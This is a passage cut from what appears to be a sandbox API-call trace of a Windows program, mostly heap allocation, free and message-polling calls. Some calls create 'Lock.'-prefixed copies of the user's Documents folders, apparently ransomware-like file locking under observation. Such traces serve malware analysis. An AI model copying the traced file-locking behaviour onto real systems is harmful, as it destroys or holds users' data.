Flags=0x0, Size=0x4) returned 0x2a71ec8 [0219.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0219.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0219.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0219.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/My Videos" (normalized: "c:\\users\\fd1hvy\\documents\\my videos"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0219.250] GetLastError () returned 0x5 [0219.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3855010 | out: hHeap=0x2af0000) returned 1 [0219.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0219.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0219.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0219.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0219.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0219.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0219.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38541a0 [0219.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.252] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0219.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38541a0 | out: hHeap=0x2af0000) returned 1 [0219.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0219.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0219.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0219.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.My Videos" (normalized: "c:\\users\\fd1hvy\\documents\\lock.my videos"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac [0219.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0219.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0219.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0219.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0219.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0219.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.256] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0219.256] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0219.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0219.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0219.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0219.257] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0219.257] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0219.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0219.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0219.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0219.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0219.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0219.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab218 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0219.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0219.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0219.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0219.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0219.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0219.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0219.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0219.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0219.259] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0219.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0219.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0219.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0219.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0219.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0219.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0219.260] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0219.260] RtlAllocateHeap 